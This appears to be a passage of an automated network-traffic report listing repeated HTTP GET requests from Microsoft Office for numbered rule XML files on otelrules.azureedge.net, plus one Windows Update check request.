Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PpmzE7nWNbHrURx&MD=ocWWztpu HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
